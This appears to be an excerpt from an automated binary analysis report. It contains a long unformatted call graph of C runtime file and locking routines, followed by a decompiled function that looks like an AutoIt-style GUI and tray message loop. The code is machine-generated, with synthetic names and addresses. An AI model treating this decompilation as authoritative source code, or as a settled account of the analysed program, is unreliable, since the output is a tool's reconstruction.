28249 414ffa 28248->28249 28250 41500f 28248->28250 28877 417f77 46 API calls __getptd_noexit 28249->28877 28252 415471 __lock_file 47 API calls 28250->28252 28254 415017 28252->28254 28253 414fff 28878 417f25 10 API calls __mbschr_l 28253->28878 28256 414e4e __ftell_nolock 51 API calls 28254->28256 28257 415024 28256->28257 28879 41503d LeaveCriticalSection LeaveCriticalSection _fseek 28257->28879 28259 41500a _raise 28259->28161 28261 414dd6 28260->28261 28262 414deb 28260->28262 28271 417f77 46 API calls __getptd_noexit 28261->28271 28262->28261 28264 414df2 28262->28264 28273 41b91b 79 API calls 11 library calls 28264->28273 28265 414ddb 28272 417f25 10 API calls __mbschr_l 28265->28272 28268 414e18 28270 414de6 28268->28270 28274 418f98 77 API calls 7 library calls 28268->28274 28270->28213 28271->28265 28272->28270 28273->28268 28274->28270 28278 414910 _raise 28275->28278 28276 414923 28331 417f77 46 API calls __getptd_noexit 28276->28331 28278->28276 28280 414951 28278->28280 28279 414928 28332 417f25 10 API calls __mbschr_l 28279->28332 28294 41d4d1 28280->28294 28283 414956 28284 41496a 28283->28284 28285 41495d 28283->28285 28287 414992 28284->28287 28288 414972 28284->28288 28333 417f77 46 API calls __getptd_noexit 28285->28333 28311 41d218 28287->28311 28334 417f77 46 API calls __getptd_noexit 28288->28334 28291 414933 _raise @_EH4_CallFilterFunc@8 28291->28218 28295 41d4dd _raise 28294->28295 28296 4182cb __lock 46 API calls 28295->28296 28297 41d4eb 28296->28297 28298 41d567 28297->28298 28306 418209 __mtinitlocknum 46 API calls 28297->28306 28309 41d560 28297->28309 28339 4154b2 47 API calls __lock 28297->28339 28340 415520 LeaveCriticalSection LeaveCriticalSection _doexit 28297->28340 28300 416b04 __malloc_crt 46 API calls 28298->28300 28301 41d56e 28300->28301 28303 41d57c InitializeCriticalSectionAndSpinCount 28301->28303 28301->28309 28302 41d5f0 _raise 28302->28283 28304 41d59c 28303->28304 28305 41d5af EnterCriticalSection 28303->28305 28308 
413748 _free 46 API calls 28304->28308 28305->28309 28306->28297 28308->28309 28336 41d5fb 28309->28336 28312 41d23a 28311->28312 28313 41d255 28312->28313 28325 41d26c __wopenfile 28312->28325 28345 417f77 46 API calls __getptd_noexit 28313->28345 28314 41d421 28317 41d47a 28314->28317 28318 41d48c 28314->28318 28316 41d25a 28346 417f25 10 API calls __mbschr_l 28316->28346 28350 417f77 46 API calls __getptd_noexit 28317->28350 28342 422bf9 28318->28342 28322 41d47f 28351 417f25 10 API calls __mbschr_l 28322->28351 28323 41499d 28335 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 28323->28335 28325->28314 28325->28317 28347 41341f 58 API calls 2 library calls 28325->28347 28327 41d41a 28327->28314 28348 41341f 58 API calls 2 library calls 28327->28348 28329 41d439 28329->28314 28349 41341f 58 API calls 2 library calls 28329->28349 28331->28279 28332->28291 28333->28291 28334->28291 28335->28291 28341 4181f2 LeaveCriticalSection 28336->28341 28338 41d602 28338->28302 28339->28297 28340->28297 28341->28338 28352 422b35 28342->28352 28344 422c14 28344->28323 28345->28316 28346->28323 28347->28327 28348->28329 28349->28314 28350->28322 28351->28323 28355 422b41 _raise 28352->28355 28353 422b54 28470 417f77 46 API calls __getptd_noexit 28353->28470 28355->28353 28356 422b8a 28355->28356 28363 422400 28356->28363 28357 422b59 28471 417f25 10 API calls __mbschr_l 28357->28471 28360 422ba4 28472 422bcb LeaveCriticalSection __unlock_fhandle 28360->28472 28362 422b63 _raise 28362->28344 28364 422427 28363->28364 28365 414021 __tsopen_nolock 46 API calls 28364->28365 28367 422443 28365->28367 28366 417ed3 __invoke_watson 10 API calls 28374 422b34 _raise 28366->28374 28368 422482 28367->28368 28375 4224dd 28367->28375 28416 4226b2 28367->28416 28369 417f8a __commit 46 API calls 28368->28369 28371 422487 28369->28371 28370 422b54 28372 417f77 __mbschr_l 46 API calls 28370->28372 28373 417f77 __mbschr_l 46 API calls 28371->28373 28377 422b59 28372->28377 28378 422491 
28373->28378 28374->28370 28376 422b8a 28374->28376 28380 422564 28375->28380 28389 422537 28375->28389 28379 422400 __tsopen_nolock 100 API calls 28376->28379 28381 417f25 __mbschr_l 10 API calls 28377->28381 28382 417f25 __mbschr_l 10 API calls 28378->28382 28383 422ba4 28379->28383 28384 417f8a __commit 46 API calls 28380->28384 28388 422b63 _raise 28381->28388 28394 42249b 28382->28394 28385 422bcb __wsopen_helper LeaveCriticalSection 28383->28385 28386 422569 28384->28386 28385->28388 28387 417f77 __mbschr_l 46 API calls 28386->28387 28390 422573 28387->28390 28388->28360 28391 41af1c __alloc_osfhnd 51 API calls 28389->28391 28392 417f25 __mbschr_l 10 API calls 28390->28392 28393 4225f5 28391->28393 28392->28394 28395 4225fe 28393->28395 28396 42261f CreateFileW 28393->28396 28394->28360 28397 417f8a __commit 46 API calls 28395->28397 28398 4226bc GetFileType 28396->28398 28399 42264c 28396->28399 28400 422603 28397->28400 28401 4226c9 GetLastError 28398->28401 28402 42270d 28398->28402 28403 422685 GetLastError 28399->28403 28406 422660 CreateFileW 28399->28406 28404 417f77 __mbschr_l 46 API calls 28400->28404 28405 417f9d __dosmaperr 46 API calls 28401->28405 28413 41ace6 __set_osfhnd 47 API calls 28402->28413 28407 417f9d __dosmaperr 46 API calls 28403->28407 28408 42260d 28404->28408 28409 4226f2 CloseHandle 28405->28409 28406->28398 28406->28403 28410 4226ac 28407->28410 28411 417f77 __mbschr_l 46 API calls 28408->28411 28409->28410 28412 422700 28409->28412 28414 417f77 __mbschr_l 46 API calls 28410->28414 28411->28394 28415 417f77 __mbschr_l 46 API calls 28412->28415 28419 42272b 28413->28419 28414->28416 28417 422705 28415->28417 28416->28366 28417->28410 28418 422942 28418->28416 28421 422aaa CloseHandle CreateFileW 28418->28421 28419->28418 28420 41e17f __lseek_nolock 48 API calls 28419->28420 28423 422799 28419->28423 28422 42278b 28420->28422 28424 422ad7 GetLastError 28421->28424 28425 422b05 28421->28425 28426 422794 28422->28426 28427 4227ad 
28422->28427 28423->28418 28432 42294b 28423->28432 28435 4227a1 28423->28435 28444 42289b 28423->28444 28428 417f9d __dosmaperr 46 API calls 28424->28428 28425->28416 28429 417f8a __commit 46 API calls 28426->28429 28430 41da15 __read_nolock 56 API calls 28427->28430 28431 422ae3 28428->28431 28429->28423 28433 4227be 28430->28433 28434 41ad67 __free_osfhnd 47 API calls 28431->28434 28432->28418 28443 422968 28432->28443 28448 4228bf 28432->28448 28437 4227df 28433->28437 28438 4227cc 28433->28438 28434->28425 28441 41d762 __close_nolock 49 API calls 28435->28441 28436 422913 28440 41da15 __read_nolock 56 API calls 28436->28440 28439 41e17f __lseek_nolock 48 API calls 28437->28439 28442 4238da __chsize_nolock 80 API calls 28438->28442 28439->28423 28456 422920 28440->28456 28441->28410 28445 4227d8 28442->28445 28446 420494 __lseeki64_nolock 48 API calls 28443->28446 28444->28418 28444->28436 28444->28448 28449 4228ea 28444->28449 28445->28435 28445->28437 28447 422973 28446->28447 28447->28448 28451 42297e 28447->28451 28448->28418 28448->28435 28452 41b7b2 __write 77 API calls 28448->28452 28450 420494 __lseeki64_nolock 48 API calls 28449->28450 28458 4228f5 28450->28458 28459 420494 __lseeki64_nolock 48 API calls 28451->28459 28452->28448 28453 4229c3 28455 4229e5 28453->28455 28457 4229ca 28453->28457 28454 4229a9 28461 41d762 __close_nolock 49 API calls 28454->28461 28460 41e17f __lseek_nolock 48 API calls 28455->28460 28456->28418 28456->28435 28456->28453 28456->28454 28456->28455 28462 41e17f __lseek_nolock 48 API calls 28457->28462 28458->28448 28463 4228fc 28458->28463 28464 422988 28459->28464 28466 42298d 28460->28466 28465 4229b0 28461->28465 28462->28466 28467 420494 __lseeki64_nolock 48 API calls 28463->28467 28464->28466 28468 417f77 __mbschr_l 46 API calls 28465->28468 28466->28418 28466->28435 28469 422906 28467->28469 28468->28416 28469->28435 28469->28436 28470->28357 28471->28362 28472->28362 28474 4150dd _raise 28473->28474 28475 4150e9 
28474->28475 28476 41510f 28474->28476 28504 417f77 46 API calls __getptd_noexit 28475->28504 28486 415471 28476->28486 28479 4150ee 28505 417f25 10 API calls __mbschr_l 28479->28505 28485 4150f9 _raise 28485->28223 28487 415483 28486->28487 28488 4154a5 EnterCriticalSection 28486->28488 28487->28488 28489 41548b 28487->28489 28490 415117 28488->28490 28491 4182cb __lock 46 API calls 28489->28491 28492 415047 28490->28492 28491->28490 28493 415067 28492->28493 28494 415057 28492->28494 28496 415079 28493->28496 28507 414e4e 28493->28507 28562 417f77 46 API calls __getptd_noexit 28494->28562 28524 41443c 28496->28524 28501 4150b9 28537 41e1f4 28501->28537 28503 41505c 28506 415143 LeaveCriticalSection LeaveCriticalSection _fseek 28503->28506 28504->28479 28505->28485 28506->28485 28508 414e61 28507->28508 28509 414e79 28507->28509 28563 417f77 46 API calls __getptd_noexit 28508->28563 28511 414139 __fclose_nolock 46 API calls 28509->28511 28513 414e80 28511->28513 28512 414e66 28564 417f25 10 API calls __mbschr_l 28512->28564 28515 41e1f4 __write 51 API calls 28513->28515 28517 414e97 28515->28517 28516 414e71 28516->28496 28517->28516 28518 414f09 28517->28518 28520 414ec9 28517->28520 28565 417f77 46 API calls __getptd_noexit 28518->28565 28520->28516 28521 41e1f4 __write 51 API calls 28520->28521 28522 414f64 28521->28522 28522->28516 28523 41e1f4 __write 51 API calls 28522->28523 28523->28516 28525 414455 28524->28525 28529 414477 28524->28529 28526 414139 __fclose_nolock 46 API calls 28525->28526 28525->28529 28527 414470 28526->28527 28566 41b7b2 77 API calls 6 library calls 28527->28566 28530 414139 28529->28530 28531 414145 28530->28531 28532 41415a 28530->28532 28567 417f77 46 API calls __getptd_noexit 28531->28567 28532->28501 28534 41414a 28568 417f25 10 API calls __mbschr_l 28534->28568 28536 414155 28536->28501 28538 41e200 _raise 28537->28538 28539 41e223 28538->28539 28540 41e208 28538->28540 28542 41e22f 28539->28542 28545 41e269 28539->28545 28589 
417f8a 46 API calls __getptd_noexit 28540->28589 28591 417f8a 46 API calls __getptd_noexit 28542->28591 28543 41e20d 28590 417f77 46 API calls __getptd_noexit 28543->28590 28569 41ae56 28545->28569 28547 41e234 28592 417f77 46 API calls __getptd_noexit 28547->28592 28550 41e26f 28552 41e291 28550->28552 28553 41e27d 28550->28553 28551 41e23c 28593 417f25 10 API calls __mbschr_l 28551->28593 28594 417f77 46 API calls __getptd_noexit 28552->28594 28579 41e17f 28553->28579 28555 41e215 _raise 28555->28503 28558 41e289 28596 41e2c0 LeaveCriticalSection __unlock_fhandle 28558->28596 28559 41e296 28595 417f8a 46 API calls __getptd_noexit 28559->28595 28562->28503 28563->28512 28564->28516 28565->28516 28566->28529 28567->28534 28568->28536 28570 41ae62 _raise 28569->28570 28571 41aebc 28570->28571 28572 4182cb __lock 46 API calls 28570->28572 28573 41aec1 EnterCriticalSection 28571->28573 28575 41aede _raise 28571->28575 28574 41ae8e 28572->28574 28573->28575 28576 41aeaa 28574->28576 28577 41ae97 InitializeCriticalSectionAndSpinCount 28574->28577 28575->28550 28597 41aeec LeaveCriticalSection _doexit 28576->28597 28577->28576 28598 41aded 28579->28598 28581 41e18e 28582 41e1a4 SetFilePointer 28581->28582 28583 41e194 28581->28583 28584 41e1c3 28582->28584 28585 41e1bb GetLastError 28582->28585 28611 417f77 46 API calls __getptd_noexit 28583->28611 28588 41e199 28584->28588 28612 417f9d 46 API calls 3 library calls 28584->28612 28585->28584 28588->28558 28589->28543 28590->28555 28591->28547 28592->28551 28593->28555 28594->28559 28595->28558 28596->28555 28597->28571 28599 41ae12 28598->28599 28600 41adfa 28598->28600 28603 417f8a __commit 46 API calls 28599->28603 28604 41ae51 28599->28604 28601 417f8a __commit 46 API calls 28600->28601 28602 41adff 28601->28602 28605 417f77 __mbschr_l 46 API calls 28602->28605 28606 41ae23 28603->28606 28604->28581 28607 41ae07 28605->28607 28608 417f77 __mbschr_l 46 API calls 28606->28608 28607->28581 28609 41ae2b 28608->28609 28610 
417f25 __mbschr_l 10 API calls 28609->28610 28610->28607 28611->28588 28612->28588 28614 4149ea 28613->28614 28615 4149fe 28613->28615 28659 417f77 46 API calls __getptd_noexit 28614->28659 28617 4149fa 28615->28617 28619 41443c __flush 77 API calls 28615->28619 28631 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 28617->28631 28618 4149ef 28660 417f25 10 API calls __mbschr_l 28618->28660 28621 414a0a 28619->28621 28632 41d8c2 28621->28632 28624 414139 __fclose_nolock 46 API calls 28625 414a18 28624->28625 28636 41d7fe 28625->28636 28627 414a1e 28627->28617 28628 413748 _free 46 API calls 28627->28628 28628->28617 28629->28234 28630->28238 28631->28238 28633 414a12 28632->28633 28634 41d8d2 28632->28634 28633->28624 28634->28633 28635 413748 _free 46 API calls 28634->28635 28635->28633 28637 41d80a _raise 28636->28637 28638 41d812 28637->28638 28639 41d82d 28637->28639 28676 417f8a 46 API calls __getptd_noexit 28638->28676 28641 41d839 28639->28641 28644 41d873 28639->28644 28678 417f8a 46 API calls __getptd_noexit 28641->28678 28642 41d817 28677 417f77 46 API calls __getptd_noexit 28642->28677 28648 41ae56 ___lock_fhandle 48 API calls 28644->28648 28646 41d83e 28679 417f77 46 API calls __getptd_noexit 28646->28679 28650 41d879 28648->28650 28649 41d846 28680 417f25 10 API calls __mbschr_l 28649->28680 28652 41d893 28650->28652 28653 41d887 28650->28653 28681 417f77 46 API calls __getptd_noexit 28652->28681 28661 41d762 28653->28661 28654 41d81f _raise 28654->28627 28657 41d88d 28682 41d8ba LeaveCriticalSection __unlock_fhandle 28657->28682 28659->28618 28660->28617 28662 41aded __commit 46 API calls 28661->28662 28665 41d772 28662->28665 28663 41d7c8 28683 41ad67 47 API calls 2 library calls 28663->28683 28665->28663 28666 41aded __commit 46 API calls 28665->28666 28675 41d7a6 28665->28675 28670 41d79d 28666->28670 28667 41aded __commit 46 API calls 28671 41d7b2 FindCloseChangeNotification 28667->28671 28668 41d7f2 28668->28657 28669 41d7d0 28669->28668 
28684 417f9d 46 API calls 3 library calls 28669->28684 28673 41aded __commit 46 API calls 28670->28673 28671->28663 28674 41d7be GetLastError 28671->28674 28673->28675 28674->28663 28675->28663 28675->28667 28676->28642 28677->28654 28678->28646 28679->28649 28680->28654 28681->28657 28682->28654 28683->28669 28684->28668 28686 414c82 _raise 28685->28686 28687 414cc3 28686->28687 28688 414c96 _memset 28686->28688 28689 414cbb _raise 28686->28689 28690 415471 __lock_file 47 API calls 28687->28690 28712 417f77 46 API calls __getptd_noexit 28688->28712 28689->28243 28692 414ccb 28690->28692 28698 414aba 28692->28698 28693 414cb0 28713 417f25 10 API calls __mbschr_l 28693->28713 28702 414ad8 _memset 28698->28702 28705 414af2 28698->28705 28699 414ae2 28765 417f77 46 API calls __getptd_noexit 28699->28765 28701 414ae7 28766 417f25 10 API calls __mbschr_l 28701->28766 28702->28699 28702->28705 28709 414b2d 28702->28709 28714 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 28705->28714 28706 414c38 _memset 28768 417f77 46 API calls __getptd_noexit 28706->28768 28707 414139 __fclose_nolock 46 API calls 28707->28709 28709->28705 28709->28706 28709->28707 28715 41dfcc 28709->28715 28745 41d8f3 28709->28745 28767 41e0c2 46 API calls 3 library calls 28709->28767 28712->28693 28713->28689 28714->28689 28716 41dfd8 _raise 28715->28716 28717 41dfe0 28716->28717 28718 41dffb 28716->28718 28838 417f8a 46 API calls __getptd_noexit 28717->28838 28720 41e007 28718->28720 28724 41e041 28718->28724 28840 417f8a 46 API calls __getptd_noexit 28720->28840 28721 41dfe5 28839 417f77 46 API calls __getptd_noexit 28721->28839 28723 41e00c 28841 417f77 46 API calls __getptd_noexit 28723->28841 28727 41e063 28724->28727 28728 41e04e 28724->28728 28730 41ae56 ___lock_fhandle 48 API calls 28727->28730 28843 417f8a 46 API calls __getptd_noexit 28728->28843 28732 41e069 28730->28732 28731 41e053 28844 417f77 46 API calls __getptd_noexit 28731->28844 28733 41e077 28732->28733 28734 41e08b 
                                  C-Code - Quality: 92%
                                  			E004091E0(struct tagMSG* __ecx, struct tagMSG* __edx, void* __fp0, signed int _a4) {
                                  				struct tagMSG _v32;
                                  				char _v48;
                                  				char _v64;
                                  				char _v80;
                                  				char _v96;
                                  				char _v100;
                                  				char _v104;
                                  				char _v108;
                                  				char _v112;
                                  				char _v116;
                                  				char _v120;
                                  				char _v124;
                                  				char _v128;
                                  				char _v132;
                                  				char _v136;
                                  				char _v140;
                                  				char _v144;
                                  				intOrPtr _v152;
                                  				int _v156;
                                  				char _v164;
                                  				struct tagMSG _v188;
                                  				struct HWND__* _v192;
                                  				int _v196;
                                  				struct HWND__* _v204;
                                  				char _v208;
                                  				struct HWND__* _v220;
                                  				struct tagMSG _v244;
                                  				char _v248;
                                  				char _v252;
                                  				long _v256;
                                  				long _v260;
                                  				struct HWND__* _v264;
                                  				int _v268;
                                  				struct HWND__* _v272;
                                  				signed int _v276;
                                  				char _v277;
                                  				char _v288;
                                  				int _v292;
                                  				struct HWND__* _v300;
                                  				struct HWND__* _v304;
                                  				struct HWND__* _v308;
                                  				struct tagMSG* _v312;
                                  				char _v316;
                                  				long _v324;
                                  				signed int _v328;
                                  				char _v329;
                                  				struct HWND__* _v332;
                                  				struct tagMSG* _v336;
                                  				void* __ebx;
                                  				void* __edi;
                                  				signed int __esi;
                                  				intOrPtr _t280;
                                  				int _t282;
                                  				intOrPtr _t283;
                                  				struct tagMSG* _t285;
                                  				struct HWND__* _t291;
                                  				struct HWND__* _t295;
                                  				intOrPtr* _t297;
                                  				struct HWND__* _t299;
                                  				struct HWND__* _t302;
                                  				struct HWND__* _t307;
                                  				struct HWND__* _t329;
                                  				struct HWND__* _t331;
                                  				struct HWND__* _t336;
                                  				struct HWND__* _t337;
                                  				struct HWND__* _t338;
                                  				struct HWND__* _t342;
                                  				struct HWND__* _t347;
                                  				void* _t349;
                                  				struct HWND__* _t355;
                                  				struct tagMSG* _t358;
                                  				long _t359;
                                  				void* _t368;
                                  				void* _t379;
                                  				void* _t380;
                                  				struct tagMSG* _t384;
                                  				signed int _t385;
                                  				void* _t400;
                                  				signed int _t403;
                                  				void* _t405;
                                  				int _t406;
                                  				void* _t407;
                                  				struct HWND__* _t414;
                                  				int _t415;
                                  				struct HWND__* _t417;
                                  				struct HWND__* _t423;
                                  				intOrPtr _t431;
                                  				struct HWND__* _t437;
                                  				struct HWND__* _t442;
                                  				intOrPtr _t460;
                                  				void* _t462;
                                  				struct tagMSG* _t467;
                                  				signed int _t480;
                                  				struct tagMSG* _t511;
                                  				signed int _t545;
                                  				void* _t549;
                                  				struct tagMSG** _t552;
                                  				struct HWND__** _t553;
                                  				struct tagMSG* _t560;
                                  				struct HWND__* _t564;
                                  				struct HWND__* _t565;
                                  				signed int _t566;
                                  				signed int _t570;
                                  				struct HWND__** _t572;
                                  				void* _t598;
                                  
                                  				_t606 = __fp0;
                                  				_t511 = __edx;
                                  				_t471 = __ecx;
                                  				_t572 = (_t570 & 0xfffffff8) - 0x14c;
                                  				_t533 = __ecx;
                                  				_t280 =  *((intOrPtr*)(__ecx + 0xec));
                                  				if(_t280 >= 0xf3c) {
                                  					 *0x4974e2 = 0;
                                  					E0045E737(__fp0, __ecx, 0x9a, 0xffffffff);
                                  					_t282 = 1;
                                  					L33:
                                  					return _t282;
                                  				}
                                  				_t283 = _t280 + 1;
                                  				_v312 = __ecx;
                                  				 *((intOrPtr*)(__ecx + 0xec)) = _t283;
                                  				if(_t283 == 1) {
                                  					E00410940(__ecx, __fp0);
                                  				}
                                  				_t533[0x51] = 0;
                                  				if(_t533[0x3f] != 0) {
                                  					L30:
                                  					_t285 = _t533[0x3b];
                                  					_t533[0x51] = 0;
                                  					if(_t285 == 1) {
                                  						E0040F190(_t471, _t533);
                                  						__eflags = _t533[0x3f] - 1;
                                  						if(__eflags == 0) {
                                  							goto L32;
                                  						}
                                  						E00401A50(_t533, _t511, __eflags, _t606);
                                  						LockWindowUpdate(0);
                                  						DestroyWindow( *0x497518); // executed
                                  						_t291 = GetMessageW( &_v32, 0, 0, 0);
                                  						__eflags = _t291;
                                  						if(_t291 <= 0) {
                                  							goto L32;
                                  						}
                                  						do {
                                  							TranslateMessage( &_v32);
                                  							DispatchMessageW( &_v32);
                                  							_t295 = GetMessageW( &_v32, 0, 0, 0);
                                  							__eflags = _t295;
                                  						} while (_t295 > 0);
                                  						goto L32;
                                  					} else {
                                  						_t533[0x3b] = _t285 - 1;
                                  						L32:
                                  						_t282 = 0;
                                  						goto L33;
                                  					}
                                  				} else {
                                  					while(_t533[0x51] == 0) {
                                  						if( *0x4974e3 != 0) {
                                  							L10:
                                  							if( *0x4a8624 != 0) {
                                  								_t297 =  *0x4a8628; // 0x0
                                  								_t460 =  *_t297;
                                  								E00431D7F();
                                  								_t299 = _t533[0x6c];
                                  								_t545 = 0;
                                  								__eflags = _t299;
                                  								if(_t299 == 0) {
                                  									L80:
                                  									__eflags = _t545 - _t299;
                                  									if(__eflags == 0) {
                                  										goto L11;
                                  									}
                                  									E00465124( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t533[0x6b] + _t545 * 4)))) + 8)),  *((intOrPtr*)(_t533[0x6b] + _t545 * 4)), __eflags, _t533,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t533[0x6b] + _t545 * 4)))) + 8)),  &_v252,  &_v112,  &_v100,  &_v136);
                                  									_t511 = _t533[0x6b];
                                  									_t471 =  *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18;
                                  									_v276 =  &(_v276->i);
                                  									E0040E0A0( &(_t533[0x53]),  *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18);
                                  									E0047D33E( *((intOrPtr*)( *((intOrPtr*)(_t511 + _t545 * 4)))) + 0x18, _t511, _t606, _t533,  &(_v276->i), 1, 0);
                                  									L29:
                                  									if(_t533[0x3f] == 0) {
                                  										continue;
                                  									}
                                  									goto L30;
                                  								}
                                  								_t471 = _t533[0x6b];
                                  								do {
                                  									_t511 = _t471->hwnd;
                                  									__eflags = _t511->hwnd;
                                  									if(_t511->hwnd == 0) {
                                  										goto L79;
                                  									}
                                  									_t511 = _t511->hwnd;
                                  									__eflags = _t511->hwnd - _t460;
                                  									if(_t511->hwnd == _t460) {
                                  										goto L80;
                                  									}
                                  									L79:
                                  									_t545 = _t545 + 1;
                                  									_t471 =  &(_t471->message);
                                  									__eflags = _t545 - _t533[0x6c];
                                  								} while (_t545 < _t533[0x6c]);
                                  								goto L80;
                                  							}
                                  							L11:
                                  							if( *0x4974ec == 1) {
                                  								__eflags =  *0x4974e3;
                                  								if( *0x4974e3 != 0) {
                                  									goto L12;
                                  								}
                                  								Sleep(0xa);
                                  								goto L29;
                                  							}
                                  							L12:
                                  							if(_t533[0x118] != 0) {
                                  								__eflags =  *0x4a954c;
                                  								if( *0x4a954c != 0) {
                                  									goto L13;
                                  								}
                                  								_t467 = _t533[0x116];
                                  								 *0x4a954c = 1;
                                  								_v308 = 0;
                                  								_v328 = _t467;
                                  								while(1) {
                                  									_t511 =  &_v328;
                                  									 *_t572 = 0;
                                  									_t329 = E00442A55(_t511, _t471);
                                  									__eflags = _t329;
                                  									if(_t329 == 0) {
                                  										goto L93;
                                  									}
                                  									_t347 = _t467->hwnd;
                                  									__eflags =  *((char*)(_t347 + 0x11));
                                  									if( *((char*)(_t347 + 0x11)) != 0) {
                                  										L92:
                                  										_t471 =  &_v324;
                                  										E00440847( &_v328,  &_v324);
                                  										_t467 = _v336;
                                  										continue;
                                  									}
                                  									_v324 = _t347;
                                  									_t349 = E0040C620( *((intOrPtr*)(_t347 + 0x14)));
                                  									__eflags = _t511;
                                  									if(__eflags < 0) {
                                  										goto L92;
                                  									}
                                  									if(__eflags > 0) {
                                  										L91:
                                  										_v308 =  &(_v308->i);
                                  										 *((intOrPtr*)(_t467->hwnd + 0x14)) = timeGetTime();
                                  										E00465124(_t467,  &_v248, __eflags, _t533, _t467,  &_v248,  &_v128,  &_v144,  &_v140);
                                  										_t355 =  &(_v272->i);
                                  										__eflags = _t355;
                                  										_v272 = _t355;
                                  										 *((char*)(_t467->hwnd + 0x10)) = 1;
                                  										E0047D33E(_t467, _t467->hwnd, _t606, _t533, _t355, 1, 0);
                                  										 *((char*)(_t467->hwnd + 0x10)) = 0;
                                  										goto L92;
                                  									}
                                  									__eflags = _t349 -  *((intOrPtr*)(_v324 + 0x18));
                                  									if(__eflags < 0) {
                                  										goto L92;
                                  									}
                                  									goto L91;
                                  								}
                                  								while(1) {
                                  									L93:
                                  									_v328 = _t533[0x116];
                                  									while(1) {
                                  										L94:
                                  										_t471 =  &_v328;
                                  										 *_t572 = 0;
                                  										_t331 = E00442A55( &_v328,  &_v328);
                                  										__eflags = _t331;
                                  										if(_t331 == 0) {
                                  											break;
                                  										}
                                  										_t511 = _v328;
                                  										_t342 = _t511->hwnd;
                                  										__eflags =  *((char*)(_t342 + 0x11));
                                  										if( *((char*)(_t342 + 0x11)) != 0) {
                                  											E004521B3( &(_t533[0x116]),  &_v328);
                                  											L93:
                                  											_v328 = _t533[0x116];
                                  											continue;
                                  										}
                                  										_t471 =  &_v324;
                                  										_t511 =  &_v328;
                                  										E00440847(_t511,  &_v324);
                                  									}
                                  									__eflags = _v308;
                                  									 *0x4a954c = 0;
                                  									if(_v308 > 0) {
                                  										goto L29;
                                  									}
                                  									goto L13;
                                  								}
                                  							}
                                  							L13:
                                  							if( *0x4a863c != 0) {
                                  								__eflags = _t533[0x119] - 1;
                                  								if(_t533[0x119] == 1) {
                                  									goto L14;
                                  								}
                                  								__eflags =  *0x4a8668 - 1;
                                  								if( *0x4a8668 == 1) {
                                  									goto L14;
                                  								}
                                  								E0044C29D( &_v244);
                                  								while(1) {
                                  									_t511 =  &_v244;
                                  									_t302 = E0045178A(0x4a8630, _t511);
                                  									__eflags = _t302;
                                  									if(_t302 == 0) {
                                  										break;
                                  									}
                                  									__eflags = E00436565( &(_v244.message));
                                  									if(__eflags != 0) {
                                  										continue;
                                  									}
                                  									_t307 = E00465124( &_v208, _v244.message, __eflags, _t533, _v244.message,  &_v208,  &_v132,  &_v120,  &_v104);
                                  									__eflags = _t307;
                                  									if(_t307 == 0) {
                                  										continue;
                                  									}
                                  									_v300 = 0;
                                  									_v292 = 1;
                                  									_v288 = 0;
                                  									E00408F40(1,  &_v300);
                                  									_v292 = 1;
                                  									_v300 = _v244.hwnd;
                                  									E00401B10(L"@GUI_CTRLID",  &_v96, __eflags);
                                  									E00401980(2, 1,  &_v300,  &_v96);
                                  									E00402250( &_v96);
                                  									E00408F40(L"@GUI_CTRLID",  &_v300);
                                  									_v292 = 7;
                                  									_v300 = _v244.pt;
                                  									E00401B10(L"@GUI_WINHANDLE",  &_v64, __eflags);
                                  									E00401980(2, 1,  &_v300,  &_v64);
                                  									E00402250( &_v64);
                                  									E00408F40(L"@GUI_WINHANDLE",  &_v300);
                                  									_t536 = L"@GUI_CTRLHANDLE";
                                  									_t559 =  &_v48;
                                  									_v292 = 7;
                                  									_v300 = _v220;
                                  									E00401B10(L"@GUI_CTRLHANDLE",  &_v48, __eflags);
                                  									_t511 =  &_v300;
                                  									E00401980(2, 1, _t511,  &_v48);
                                  									E00402250( &_v48);
                                  									_t560 = _v312;
                                  									 *((char*)(_t560 + 0x464)) = 1;
                                  									E0047D33E(_t559, _t511, _t606, _t560, _v208 + 1, 1, 0);
                                  									 *((char*)(_t560 + 0x464)) = 0;
                                  									_t553 =  &_v316;
                                  									L108:
                                  									E00408F40(_t536, _t553);
                                  									_t471 =  &(_v244.message);
                                  									E00402250( &(_v244.message));
                                  									_t533 = _v312;
                                  									goto L29;
                                  								}
                                  								_t471 =  &(_v244.message);
                                  								E00402250( &(_v244.message));
                                  							}
                                  							L14:
                                  							if(E004091B0(_t511, _t606, _t533) == 1) {
                                  								goto L29;
                                  							}
                                  							if( *0x4a87b0 != 0) {
                                  								__eflags = _t533[0x119] - 1;
                                  								if(_t533[0x119] == 1) {
                                  									goto L16;
                                  								}
                                  								E0044C29D( &_v244);
                                  								while(1) {
                                  									_t511 =  &_v244;
                                  									_t437 = E00453BC6(0x4a8710, _t511);
                                  									__eflags = _t437;
                                  									if(_t437 == 0) {
                                  										break;
                                  									}
                                  									__eflags = E00436565( &(_v244.message));
                                  									if(__eflags != 0) {
                                  										continue;
                                  									}
                                  									_t442 = E00465124( &(_v188.pt), _v244.message, __eflags, _t533, _v244.message,  &(_v188.pt),  &_v108,  &_v124,  &_v116);
                                  									__eflags = _t442;
                                  									if(_t442 == 0) {
                                  										continue;
                                  									}
                                  									_v204 = 0;
                                  									_v196 = 1;
                                  									_v192 = 0;
                                  									E00408F40(1,  &_v204);
                                  									_v196 = 1;
                                  									_t536 = L"@TRAY_ID";
                                  									_v204 = _v244.hwnd;
                                  									E00401B10(L"@TRAY_ID",  &_v80, __eflags);
                                  									_t511 =  &_v204;
                                  									E00401980(2, 1, _t511,  &_v80);
                                  									E00402250( &_v80);
                                  									_t552 = _v312;
                                  									__eflags = _v188.pt + 1;
                                  									_t552[0x119] = 1;
                                  									E0047D33E(_v188.pt + 1, _t511, _t606, _t552, _v188.pt + 1, 1, 0);
                                  									_t552[0x119] = 0;
                                  									_t553 =  &_v220;
                                  									goto L108;
                                  								}
                                  								_t471 =  &(_v244.message);
                                  								E00402250( &(_v244.message));
                                  							}
                                  							L16:
                                  							_t358 = _t533[0x3e];
                                  							if(_t358 == 7) {
                                  								_t511 = _t533[0x114];
                                  								_t359 = WaitForSingleObject(_t511, 0xa);
                                  								_v256 = _t359;
                                  								__eflags = _t359 - 0x102;
                                  								if(_t359 != 0x102) {
